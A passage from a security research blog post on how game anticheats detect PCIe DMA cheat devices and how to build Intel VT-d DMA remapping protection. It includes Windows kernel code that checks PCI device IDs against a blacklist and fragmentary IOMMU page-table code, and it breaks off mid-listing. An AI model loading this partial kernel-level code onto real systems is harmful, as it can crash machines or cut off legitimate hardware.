In a previous blog post, i talk briefly about the many methods on how anticheat systems like Vanguard protect against different type of cheating attempts. One of the methods discussed was the detection of malicious ...]]></description><link>https://research.meekolab.com/mitigating-dma-attacks-through-redirected-address-tables</link><guid isPermaLink="true">https://research.meekolab.com/mitigating-dma-attacks-through-redirected-address-tables</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 13 Nov 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1735377532949/1890d720-03a5-47a3-a576-f8129d7890f1.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by</em></strong> <a target="_blank" href="https://x.com/buruberrii_">buruberrii_</a></p>
</blockquote>
<p>In a <a target="_blank" href="https://research.meekolab.com/understanding-kernel-level-anticheats-in-online-games">previous blog post</a>, i talk briefly about the many methods on how anticheat systems like Vanguard protect against different type of cheating attempts. One of the methods discussed was the detection of malicious PCIe devices. This method has been in the news lately as of writing due to the game “Delta Force” which has caught flak over <a target="_blank" href="https://web.archive.org/web/20241206022251/https://store.steampowered.com/news/app/2507950/view/4476110736154691091">its overly aggresive detection of DMA and USB devices</a>, a product of Tencent’s AntiCheat Expert (ACE). But what is DMA and why are live service games so against it?</p>
<p>The detection of malicious PCIe devices are crucial due to the advent of Hardware-based DMA Direct Memory Access (DMA) cheats. One of the earliest example of DMA devices could be the Game Genie, that physically interfaces with the game cartridge and the console, enabling it to alter data at the memory level. Nowadays, PCIe-based DMA devices can be bought online, like this LynxDMA + KMBox set for $160 with free express shipping.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1732807210851/803514e4-e1b5-45ad-b250-cba1a42ced73.jpeg" alt class="image--center mx-auto" /></p>
<p>As many anticheat used to monitor only for malicious processes inside the kernel, DMA devices allow the cheating to happen outside of the main PC hardware. PCIe cards like the LynxDMA enables direct interaction with a computer's memory by interfacing directly with the system's memory bus, facilitating efficient data movement between memory and peripherals.</p>
<p>Many users also add a Keyboard and Mouse emulator (KMBox) that act as programmable USB development boards that functions as a keyboard and mouse controller. It allows users to run scripts directly on the device's CPU, enabling ordinary keyboards and mice to have programmable macro functions without the need for additional drivers or DLL injections, which ensures that scripts operate independently of the host PC.</p>
<h1 id="heading-current-detection-methods">Current Detection Methods</h1>
<p>Refreshing from our previous escapades, every PCI device has a set of registers commonly referred to as the PCI configuration space. In modern PCI-e devices, an extended configuration space is implemented, which is mapped into the main memory, allowing the system to read/write to the registers. The configuration space consists of a standard header containing information such as the DeviceID, VendorID, Status, and other details.</p>
<p>This configuration space allows querying important information from PCI devices within the device tree using the <code>IRP_MN_READ_CONFIG</code> code, which reads from a PCI device's configuration space.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">ValidatePciDevices</span><span class="hljs-params">()</span>
</span>{
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    status = EnumeratePciDeviceObjects(PciDeviceQueryCallback, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"EnumeratePciDeviceObjects failed with status %x"</span>, status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Windows splits <code>DEVICE_OBJECTS</code> into two categories: Physical Device Object (PDO) and Functional Device Object (FDO). A PDO represents each device connected to a physical bus and has an associated DEVICE_NODE. In contrast, an FDO represents the device’s functionality and defines how the system interacts with that device in the driver stack. A device stack can have multiple PDOs but only one FDO. To access each PCI device on the system, the anti-cheat system can enumerate all device objects given the PCI FDO, which is managed by <code>pci.sys</code>.</p>
<p>We first retrieve the driver object associated with the PCI driver (<code>pci.sys</code>). It then enumerates all device objects managed by this driver, storing them in an array. For each device object, it checks if the object is a valid Physical Device Object (PDO) by calling the <code>IsDeviceObjectValidPdo</code> function. If it is a valid PDO, the callback routine (<code>PciDeviceQueryCallback</code>) is invoked.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">EnumeratePciDeviceObjects</span><span class="hljs-params">(_In_ PCI_DEVICE_CALLBACK CallbackRoutine,
                          _In_opt_ PVOID           Context)</span>
</span>{
    NTSTATUS        status             = STATUS_UNSUCCESSFUL;
    UNICODE_STRING  pci                = RTL_CONSTANT_STRING(<span class="hljs-string">L"\\Driver\\pci"</span>);
    PDRIVER_OBJECT  pci_driver_object  = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT* pci_device_objects = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT  current_device     = <span class="hljs-literal">NULL</span>;
    UINT32          pci_device_objects_count = <span class="hljs-number">0</span>;

    status = GetDriverObjectByDriverName(&amp;pci, &amp;pci_driver_object);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetDriverObjectByDriverName failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    status = EnumerateDriverObjectDeviceObjects(
        pci_driver_object, &amp;pci_device_objects, &amp;pci_device_objects_count);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"EnumerateDriverObjectDeviceObjects failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; pci_device_objects_count; index++) {
        current_device = pci_device_objects[index];

        <span class="hljs-comment">/* make sure we have a valid PDO */</span>
        <span class="hljs-keyword">if</span> (!IsDeviceObjectValidPdo(current_device)) {
            ObDereferenceObject(current_device);
            <span class="hljs-keyword">continue</span>;
        }

        status = CallbackRoutine(current_device, Context);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
            DEBUG_ERROR(
                <span class="hljs-string">"EnumeratePciDeviceObjects CallbackRoutine failed with status %x"</span>,
                status);

        ObDereferenceObject(current_device);
    }

    <span class="hljs-keyword">if</span> (pci_device_objects)
        ExFreePoolWithTag(pci_device_objects, POOL_TAG_HW);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Then we read the device's configuration space, starting from the <code>PCI_VENDOR_ID_OFFSET</code>, and stores this data in a <code>PCI_COMMON_HEADER</code> structure. The configuration space consists of a standard header containing information such as the DeviceID, VendorID, Status, and other details. The function reads this space using an IRP with the <code>IRP_MN_READ_CONFIG</code> code.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">PciDeviceQueryCallback</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject, _In_opt_ PVOID Context)</span>
</span>{
    UNREFERENCED_PARAMETER(Context);

    NTSTATUS          status = STATUS_UNSUCCESSFUL;
    PCI_COMMON_HEADER header = {<span class="hljs-number">0</span>};

    status = QueryPciDeviceConfigurationSpace(
        DeviceObject, PCI_VENDOR_ID_OFFSET, &amp;header, <span class="hljs-keyword">sizeof</span>(PCI_COMMON_HEADER));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"QueryPciDeviceConfigurationSpace failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">if</span> (IsPciConfigurationSpaceFlagged(&amp;header)) {
        DEBUG_VERBOSE(<span class="hljs-string">"Flagged DeviceID found. Device: %llx, DeviceId: %lx"</span>,
                      (UINT64)DeviceObject,
                      header.DeviceID);
        ReportBlacklistedPcieDevice(DeviceObject, &amp;header);
    }
    <span class="hljs-keyword">else</span> {
        DEBUG_VERBOSE(<span class="hljs-string">"Device: %llx, DeviceID: %lx, VendorID: %lx"</span>,
                      DeviceObject,
                      header.DeviceID,
                      header.VendorID);
    }

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Then we can send an IRP (I/O Request Packet) to read the configuration space of the PCI device. We then wait for the IRP to complete and then returns the status of the operation.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">QueryPciDeviceConfigurationSpace</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject,
                                 _In_ UINT32         Offset,
                                 _Out_opt_ PVOID     Buffer,
                                 _In_ UINT32         BufferLength)</span>
</span>{
    NTSTATUS           status = STATUS_UNSUCCESSFUL;
    KEVENT             event  = {<span class="hljs-number">0</span>};
    IO_STATUS_BLOCK    io     = {<span class="hljs-number">0</span>};
    PIRP               irp    = <span class="hljs-literal">NULL</span>;
    PIO_STACK_LOCATION packet = <span class="hljs-literal">NULL</span>;

    <span class="hljs-keyword">if</span> (BufferLength == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_BUFFER_TOO_SMALL;

    KeInitializeEvent(&amp;event, NotificationEvent, FALSE);

    <span class="hljs-comment">/*
     * IO manager will free this IRP when the request is completed
     */</span>
    irp = IoBuildSynchronousFsdRequest(
        IRP_MJ_PNP, DeviceObject, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, &amp;event, &amp;io);

    <span class="hljs-keyword">if</span> (!irp) {
        DEBUG_ERROR(<span class="hljs-string">"IoBuildSynchronousFsdRequest failed with no status."</span>);
        <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
    }

    packet                = IoGetNextIrpStackLocation(irp);
    packet-&gt;MinorFunction = IRP_MN_READ_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.WhichSpace = PCI_WHICHSPACE_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.Offset     = Offset;
    packet-&gt;Parameters.ReadWriteConfig.Buffer     = Buffer;
    packet-&gt;Parameters.ReadWriteConfig.Length     = BufferLength;

    status = IoCallDriver(DeviceObject, irp);

    <span class="hljs-keyword">if</span> (status == STATUS_PENDING) {
        KeWaitForSingleObject(&amp;event, Executive, KernelMode, FALSE, <span class="hljs-literal">NULL</span>);
        status = io.Status;
    }

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"Failed to read configuration space with status %x"</span>,
                    status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Once the configuration space is read, we can check if the device ID is among the flagged IDs. If the device ID matches any of the flagged IDs, we can report the blacklisted device.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN
<span class="hljs-title">IsPciConfigurationSpaceFlagged</span><span class="hljs-params">(_In_ PPCI_COMMON_HEADER Configuration)</span>
</span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; FLAGGED_DEVICE_ID_COUNT; index++) {
        <span class="hljs-keyword">if</span> (Configuration-&gt;DeviceID == FLAGGED_DEVICE_IDS[index])
            <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<p>Now if you think hard, you might realize that there are alot of periperals that use PCIe, such as network cards, thunderbolt devices, and many more. You will also be correct in guessing that blacklisting certain PCIe configuration space signatures have led to some many side effects including disconnecting <a target="_blank" href="https://www.reddit.com/r/ValorantTechSupport/comments/14ehqs9/valorant_make_my_internet_disconnects_once_i_open/">PCIe-based network cards</a>, <a target="_blank" href="https://www.reddit.com/r/ValorantTechSupport/comments/wx1j3w/valorant_turning_off_my_sound_card/">PCIe-based DACs</a>, and even <a target="_blank" href="https://www.reddit.com/r/ValorantTechSupport/comments/1ghpdki/valorant_disconnects_my_laptops_usbc_port_dock/">thunderbolt docks</a>. This is predictable because PCIe DMA cheating devices sometimes share PCIe controllers with legitimate hardware. This is primarily why i hate anticheat systems, they presume guilt at all times and treat everyone as a threat actor.</p>
<h1 id="heading-vt-d-support-for-dma-remapping">VT-d Support for DMA Remapping</h1>
<p>Previously, we talked about the <a target="_blank" href="https://research.meekolab.com/the-basics-of-intel-vt-x-extensions">basics of Intel’s VT-x extensions</a> and how to use them to make a very basic virtual machine. While VT-x is the hardware feature to enable CPU virtualization, VT-d handles I/O virtualization, allowing direct assignment of physical devices (like GPUs or network cards) to virtual machines while maintaining isolation between them.</p>
<p>One of the main features of VT-d is its support for DMA remapping. At its core, DMA remapping introduces an I/O Memory Management Unit (IOMMU) that intercepts all DMA requests before they reach system memory, enforcing strict access controls and performing necessary address translations through dedicated I/O page tables.</p>
<p>In traditional virtualization without DMA remapping, direct device assignment to virtual machines poses significant security risks. When a device initiates DMA operations, it uses physical addresses, and without remapping capabilities, these devices could potentially access any physical memory location in the system. This unrestricted access creates a critical vulnerability where a compromised device or malicious driver in one VM could read or write to memory regions belonging to other VMs or the hypervisor itself, completely bypassing the CPU's memory protection mechanisms.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1732810510115/a11b7e83-09c3-4a1c-93c0-32752825ed52.jpeg" alt class="image--center mx-auto" /></p>
<p>DMA remapping solves this fundamental security challenge by introducing a hardware-enforced isolation layer. The IOMMU maintains separate I/O page tables for each device or group of devices, similar to how the CPU's MMU uses page tables for process isolation. When a device initiates a DMA operation, the IOMMU performs address translation using these I/O page tables, converting the addresses used by the device (guest physical addresses in virtualization contexts) into actual system physical addresses. This translation process ensures that devices can only access memory regions explicitly mapped in their assigned I/O page tables.</p>
<p>Modern virtualization platforms leverage DMA remapping to implement sophisticated I/O virtualization features. For instance, in SR-IOV (Single Root I/O Virtualization) configurations, a single physical device can present multiple Virtual Functions (VFs), each assigned to different VMs. DMA remapping ensures that each VF can only access memory regions allocated to its respective VM, preventing cross-VM memory access violations. The hypervisor programs the IOMMU with separate I/O page tables for each VF, establishing strict memory boundaries that are enforced in hardware.</p>
<p>While there are non-VT-d methods like Windows Kernel DMA Protection that operate within the confines of the operating system's security model, these software-based solutions typically rely on driver frameworks and kernel-mode components to validate and control DMA operations. While they can provide adequate protection under normal circumstances, they inherently trust the operating system's integrity and depend on proper driver behavior. The protection mechanisms must be implemented within each driver and validated by the operating system, introducing multiple potential points of failure.</p>
<p>The performance characteristics of hardware-based DMA protection significantly differ from software solutions. VT-d includes dedicated Translation Lookaside Buffers (TLBs) for caching frequently used address translations, minimizing the performance impact of protection checks. The hardware implementation allows DMA operations to proceed at near-native speed once translations are cached. Software-based solutions, conversely, must intercept and validate DMA operations through driver code execution, potentially introducing variable latency and CPU overhead.</p>
<h1 id="heading-implementation">Implementation</h1>
<p>The main idea for this implementation comes from <a target="_blank" href="https://standa-note.blogspot.com/2020/05/introductory-study-of-iommu-vt-d-and.html?m=1">this blog</a> from tandasat, and <a target="_blank" href="https://github.com/cutecatsandvirtualmachines/DmaProtect">this PoC</a> from cutecatsandvirtualmachines. We begin with the initialization of DMA remapping structures, which are discovered through ACPI tables - specifically the DMAR (DMA Remapping) table for Intel systems. The <code>ProcessDmarTable</code> function is responsible for parsing the DMAR ACPI table.</p>
<pre><code class="lang-c"><span class="hljs-function">EFI_STATUS <span class="hljs-title">ProcessDmarTable</span><span class="hljs-params">(
    IN EFI_ACPI_DMAR_HEADER* DmarTable,
    IN OUT DMAR_UNIT_INFORMATION* DmarUnits,
    IN UINT64 MaxDmarUnitCount,
    OUT UINT64* DetectedUnitCount)</span></span>
</code></pre>
<p>The function begins with a crucial security check using <code>MmIsAddressValid</code> to verify that the DMAR table pointer resides in valid memory space. This is essential because ACPI tables could potentially be tampered with, and accessing invalid memory could lead to system crashes or security vulnerabilities.</p>
<pre><code class="lang-c">{
    <span class="hljs-keyword">if</span> (!MmIsAddressValid(DmarTable)) {
        DbgMsg(<span class="hljs-string">"[VT-d] DMAR table ptr is invalid: %p"</span>, DmarTable);
        <span class="hljs-keyword">return</span> STATUS_NOT_MAPPED_DATA;
    }
</code></pre>
<p>The DMAR table traversal is implemented through pointer arithmetic and structure casting. Here, <code>Add2Ptr</code> calculates the end address of the DMAR table using the table's length field. The <code>DmarTable + 1</code> operation skips past the main header to the first remapping structure. This arithmetic is safe because the DMAR table's length was validated by the ACPI subsystem during boot.</p>
<pre><code class="lang-c">endOfDmar = (UINT64)Add2Ptr(DmarTable, DmarTable-&gt;Header.Length);
dmarHeader = (EFI_ACPI_DMAR_STRUCTURE_HEADER*)(DmarTable + <span class="hljs-number">1</span>);
</code></pre>
<p>The main processing loop identifies DMA Remapping Hardware Unit Definition (DRHD) structures by checking the type field. Each DRHD structure describes a remapping hardware unit capable of DMA transaction remapping. The type <code>EFI_ACPI_DMAR_TYPE_DRHD</code> specifically indicates a hardware definition structure, as opposed to other DMAR structure types like Reserved Memory Regions (RMRR) or Root Port ATS Capability (ATSR).</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (dmarHeader-&gt;Type == EFI_ACPI_DMAR_TYPE_DRHD)
</code></pre>
<p>For each discovered unit, the function reads two critical capability registers. The Capability Register (CAP_REG) contains fundamental features like supported address widths, caching requirements, and first-level translation support. The Extended Capability Register (ECAP_REG) describes advanced features like interrupt remapping, queued invalidation support, and page-walk coherency capabilities. These are read using memory-mapped I/O operations, as the registers reside in the chipset's PCI configuration space.</p>
<pre><code class="lang-c">DmarUnits[discoveredUnitCount].Capability.Uint64 =
    CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_CAP_REG);
DmarUnits[discoveredUnitCount].ExtendedCapability.Uint64 =
    CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_ECAP_REG);
</code></pre>
<p>The function implements bounded discovery through <code>MaxDmarUnitCount</code>. This prevents buffer overflows in the <code>DmarUnits</code> array while allowing for systems with multiple remapping units. The zero initialization of <code>DmarUnits</code> using <code>RtlZeroMemory</code> ensures that any unused entries remain in a known state. We then zero out the register base address after reading to prevent potential reuse of the address by malicious code that might later access the DMAR table in memory.</p>
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (discoveredUnitCount &lt; MaxDmarUnitCount)
    {
       EFI_ACPI_DMAR_DRHD_HEADER* dmarUnit;

        dmarUnit = (EFI_ACPI_DMAR_DRHD_HEADER*)dmarHeader;
        DmarUnits[discoveredUnitCount].RegisterBasePa = dmarUnit-&gt;RegisterBaseAddress;

        DmarUnits[discoveredUnitCount].Capability.Uint64 =
            CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_CAP_REG);
        DmarUnits[discoveredUnitCount].ExtendedCapability.Uint64 =
            CPU::MmIoRead&lt;DWORD64&gt;(DmarUnits[discoveredUnitCount].RegisterBasePa + R_ECAP_REG);

        dmarUnit-&gt;RegisterBaseAddress = <span class="hljs-number">0</span>;
    }
</code></pre>
<p>The function's error handling covers two critical cases:</p>
<ol>
<li><p>Too many units discovered (<code>discoveredUnitCount &gt; MaxDmarUnitCount</code>)</p>
</li>
<li><p>Invalid DMAR table pointer (initial check)</p>
</li>
</ol>
<p>Each failure case returns a specific status code that allows the caller to handle the error appropriately.</p>
<ul>
<li><p><code>STATUS_UNSUCCESSFUL</code>: No units found</p>
<pre><code class="lang-c">      <span class="hljs-keyword">if</span> (discoveredUnitCount == <span class="hljs-number">0</span>)
      {
          DbgMsg(<span class="hljs-string">"[VT-d] No DMA remapping hardware unit found"</span>);
          <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
      }
</code></pre>
</li>
<li><p><code>STATUS_RESOURCE_NOT_OWNED</code>: Too many units</p>
<pre><code class="lang-c">      <span class="hljs-keyword">if</span> (discoveredUnitCount &gt; MaxDmarUnitCount)
      {
          DbgMsg(<span class="hljs-string">"[VT-d] Too many DMA remapping hardware units found (%llu)"</span>,
              discoveredUnitCount);
          <span class="hljs-keyword">return</span> STATUS_RESOURCE_NOT_OWNED;
      }
</code></pre>
</li>
</ul>
<p>The implementation establishes a four-level page table hierarchy for DMA address translation, mirroring the structure used by modern x86-64 CPU memory management. This hierarchy is initialized through the <code>BuildPassthroughTranslations</code> function, which creates an identity mapping for all PCI devices up to 512GB of physical memory. The function meticulously constructs root tables, context tables, and second-level page tables.</p>
<pre><code class="lang-c"><span class="hljs-function">VOID <span class="hljs-title">BuildPassthroughTranslations</span><span class="hljs-params">(OUT DMAR_TRANSLATIONS* Translations)</span>
</span>{
    VTD_ROOT_ENTRY defaultRootValue;
    VTD_CONTEXT_ENTRY defaultContextValue;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pdpt;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pd;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pml4e;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pdpte;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pde;
</code></pre>
<p>The implementation supports granular memory protection through page splitting mechanisms. When fine-grained control is needed over a specific 4KB page within a 2MB large page, the <code>Split2MbPage</code> function dynamically splits the large page into 512 individual 4KB pages. This operation is crucial for implementing precise memory protection policies.</p>
<pre><code class="lang-c"><span class="hljs-function">VTD_SECOND_LEVEL_PAGING_ENTRY* <span class="hljs-title">Split2MbPage</span><span class="hljs-params">(IN OUT VTD_SECOND_LEVEL_PAGING_ENTRY* PageDirectoryEntry)</span> </span>{
    pageTable = (VTD_SECOND_LEVEL_PAGING_ENTRY*)cpp::kMalloc(PAGE_SIZE);
    baseAddress = ((UINT64)PageDirectoryEntry-&gt;Bits.AddressLo &lt;&lt; <span class="hljs-number">12</span>) |
        ((UINT64)PageDirectoryEntry-&gt;Bits.AddressHi &lt;&lt; <span class="hljs-number">32</span>);

    <span class="hljs-keyword">for</span> (UINT64 ptIndex = <span class="hljs-number">0</span>; ptIndex &lt; <span class="hljs-number">512</span>; ++ptIndex) {
        pageTable[ptIndex].Uint64 = baseAddress;
        pageTable[ptIndex].Bits.Read = readable;
        pageTable[ptIndex].Bits.Write = writable;
        baseAddress += PAGE_SIZE;
    }
}
</code></pre>
<p>The function constructs a page table hierarchy consisting of:</p>
<ol>
<li><p>Root Table: The highest level table containing 256 entries, one for each PCI bus number</p>
</li>
<li><p>Context Table: Referenced by root entries, containing device and function specific translations</p>
</li>
<li><p>Second-level page tables: PML4, PDPT (Page Directory Pointer Table), PD (Page Directory), and PT (Page Table) forming a four-level address translation structure</p>
</li>
</ol>
<p>The root table initialization is particularly important:</p>
<pre><code class="lang-c">defaultRootValue.Uint128.Uint64Hi = defaultRootValue.Uint128.Uint64Lo = <span class="hljs-number">0</span>;
UINT64 contextTable = (UINT64)Memory::VirtToPhy(Translations-&gt;ContextTable);
defaultRootValue.Bits.ContextTablePointerLo = (UINT32)(contextTable &gt;&gt; <span class="hljs-number">12</span>);
defaultRootValue.Bits.ContextTablePointerHi = (UINT32)(contextTable &gt;&gt; <span class="hljs-number">32</span>);
defaultRootValue.Bits.Present = TRUE;
</code></pre>
<p>Each root entry is a 128-bit structure that points to a context table. The physical address of the context table is split into high and low components because the hardware expects the address to be page-aligned (hence the right shift by 12). The Present bit indicates that the entry is valid and can be used by the hardware.</p>
<p>The context table setup demonstrates the configuration for 48-bit addressing. The <code>AddressWidth</code> field set to BIT1 (010b) specifically configures for 48-bit guest addresses, requiring four-level page tables. The <code>DomainIdentifier</code> provides isolation between different sets of remapping tables.</p>
<pre><code class="lang-c">defaultContextValue.Bits.DomainIdentifier = <span class="hljs-number">2</span>;
defaultContextValue.Bits.AddressWidth = BIT1;  <span class="hljs-comment">// 010b: 48-bit AGAW (4-level page table)</span>
defaultContextValue.Bits.SecondLevelPageTranslationPointerLo = (UINT32)(Pml4 &gt;&gt; <span class="hljs-number">12</span>);
defaultContextValue.Bits.SecondLevelPageTranslationPointerHi = (UINT32)(Pml4 &gt;&gt; <span class="hljs-number">32</span>);
defaultContextValue.Bits.Present = TRUE;
</code></pre>
<p>The second-level page tables implement the actual memory mapping.</p>
<pre><code class="lang-c">destinationPa = <span class="hljs-number">0</span>;
pml4Index = <span class="hljs-number">0</span>;
pdpt = Translations-&gt;SlPdpt[pml4Index];
pml4e = &amp;Translations-&gt;SlPml4[pml4Index];
pml4e-&gt;Uint64 = (UINT64)Memory::VirtToPhy(pdpt);
pml4e-&gt;Bits.Read = TRUE;
pml4e-&gt;Bits.Write = TRUE;
</code></pre>
<p>The code uses 2MB large pages at the PD level to reduce the number of page tables needed.</p>
<pre><code class="lang-c">pde = &amp;pd[pdIndex];
pde-&gt;Uint64 = destinationPa;
pde-&gt;Bits.Read = TRUE;
pde-&gt;Bits.Write = TRUE;
pde-&gt;Bits.PageSize = TRUE;
destinationPa += SIZE_2MB;
</code></pre>
<p>The <code>PageSize</code> bit set to TRUE indicates a 2MB page rather than a reference to a page table of 4KB pages. This optimization significantly reduces memory overhead while still providing sufficient granularity for most DMA operations.</p>
<p>Cache coherency is maintained through explicit writeback operations. This is crucial because the IOMMU hardware reads these tables directly from memory, and any cached modifications must be written back to ensure the hardware sees the updated values.</p>
<pre><code class="lang-c">CPU::WriteBackDataCacheRange(Translations, <span class="hljs-keyword">sizeof</span>(*Translations));
</code></pre>
<p>The identity mapping is created by setting the destination physical address equal to the input address (<code>destinationPa</code> variable), effectively making DMA operations initially transparent to devices while still going through the remapping hardware. This allows for later modification of the mappings to implement protection or isolation without requiring device driver changes.</p>
<p>The entire structure supports mapping up to 512GB of physical memory (one PML4 entry × 512 PDPT entries × 512 PD entries × 2MB per page), which is sufficient for most systems while keeping the page table structure manageable. The use of large pages significantly reduces the memory overhead and translation latency compared to using 4KB pages throughout the hierarchy.</p>
<p><code>ChangePermissionOfPageForAllDevices</code> then orchestrates fine-grained DMA access control by manipulating the hardware's page table entries. The function's sophisticated implementation allows for atomic permission modifications while maintaining system stability and security guarantees. At its core, it operates on the Intel VT-d second-level page table structure, which provides hardware-enforced DMA access control at a 4KB page granularity.</p>
<pre><code class="lang-cpp"><span class="hljs-function">EFI_STATUS <span class="hljs-title">ChangePermissionOfPageForAllDevices</span><span class="hljs-params">(
    IN OUT DMAR_TRANSLATIONS* Translations,
    IN UINT64 Address,
    IN BOOLEAN AllowReadWrite,
    OUT VTD_SECOND_LEVEL_PAGING_ENTRY** AllocatedPageTable)</span>
</span>{
    PHYSICAL_ADDRESS pa = { <span class="hljs-number">0</span> };
    EFI_STATUS status;
    ADDRESS_TRANSLATION_HELPER helper;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pde;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pt;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pte;
</code></pre>
<p>At the core of VT-d's permission management system lies the translation helper structure, which provides a precise mechanism for breaking down physical addresses into their constituent page table indices.</p>
<p>The function employs a critical address translation mechanism through the <code>ADDRESS_TRANSLATION_HELPER</code> union structure, which provides a binary-compatible overlay that decomposes a 48-bit physical address into its constituent page table indices. The decomposition splits the address bits into PML4 (bits 47-39), PDPT (bits 38-30), PD (bits 29-21), and PT (bits 20-12) indices, with the remaining bits (11-0) representing the page offset. This decomposition is crucial for traversing the page table hierarchy efficiently and accurately.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">union</span> _ADDRESS_TRANSLATION_HELPER {
    UINT64 AsUInt64;
    <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span>
        UINT64 Offset : <span class="hljs-number">12</span>;    <span class="hljs-comment">// Bits 0-11: Page offset within 4KB</span>
        UINT64 Pt : <span class="hljs-number">9</span>;         <span class="hljs-comment">// Bits 12-20: Page Table index</span>
        UINT64 Pd : <span class="hljs-number">9</span>;         <span class="hljs-comment">// Bits 21-29: Page Directory index</span>
        UINT64 Pdpt : <span class="hljs-number">9</span>;       <span class="hljs-comment">// Bits 30-38: Page Directory Pointer Table index</span>
        UINT64 Pml4 : <span class="hljs-number">9</span>;       <span class="hljs-comment">// Bits 39-47: PML4 index</span>
        UINT64 Reserved : <span class="hljs-number">16</span>;   <span class="hljs-comment">// Bits 48-63: Must be zero for valid addresses</span>
    } AsIndex;
} ADDRESS_TRANSLATION_HELPER;
</code></pre>
<p>Memory management safety is enforced through rigorous boundary checking. The function validates that the target address falls within the supported 48-bit physical address space by examining the PML4 index. Any address with a non-zero PML4 index exceeds the maximum supported physical address range, triggering an immediate failure with STATUS_UNSUCCESSFUL. This validation prevents potential security vulnerabilities that could arise from accessing out-of-bounds memory regions.</p>
<p>The function handles the complex scenario of 2MB large pages through a sophisticated page splitting mechanism. When encountering a page directory entry (PDE) marked with PageSize=TRUE (indicating a 2MB page), it invokes the <code>Split2MbPage</code> function. This operation atomically converts a single 2MB mapping into 512 individual 4KB page mappings, maintaining the original permissions while enabling fine-grained control. The splitting operation must carefully manage memory allocation, permission inheritance, and cache coherency to prevent any temporal vulnerabilities during the transition.</p>
<p>The permission modification process involves intricate physical memory manipulation. The function reconstructs the physical address of the target page table by combining the split address fields (AddressHi and AddressLo) from the page directory entry. This address is then temporarily mapped into the kernel's virtual address space using <code>MmMapIoSpaceEx</code> with specific caching attributes (PAGE_READWRITE | PAGE_NOCACHE) to ensure direct hardware access, which prevents stale cache lines from interfering with IOMMU operations.</p>
<p>We then need to write back modified page table entries using <code>CPU::WriteBackDataCacheRange</code> to ensure that all CPU caches are flushed to memory before the IOMMU hardware accesses the modified entries. Without proper cache management, there exists a race condition where the IOMMU might use stale permissions from its internal caches or encounter inconsistent memory state due to un-written CPU cache lines.</p>
<p>The real-time permission modification occurs through direct manipulation of the page table entry's permission bits. The function updates both Read and Write bits atomically based on the <code>AllowReadWrite</code> parameter. When these bits are cleared, the IOMMU hardware will actively block any DMA operations targeting the corresponding 4KB page, raising a remapping fault that can be logged and handled by the system software. This hardware-enforced blocking occurs without any runtime overhead once the permissions are set.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Locate the PDE for our target address</span>
    pde = &amp;Translations-&gt;SlPd[helper.AsIndex.Pml4][helper.AsIndex.Pdpt][helper.AsIndex.Pd];

    <span class="hljs-comment">// If this is a 2MB page, split it into 4KB pages</span>
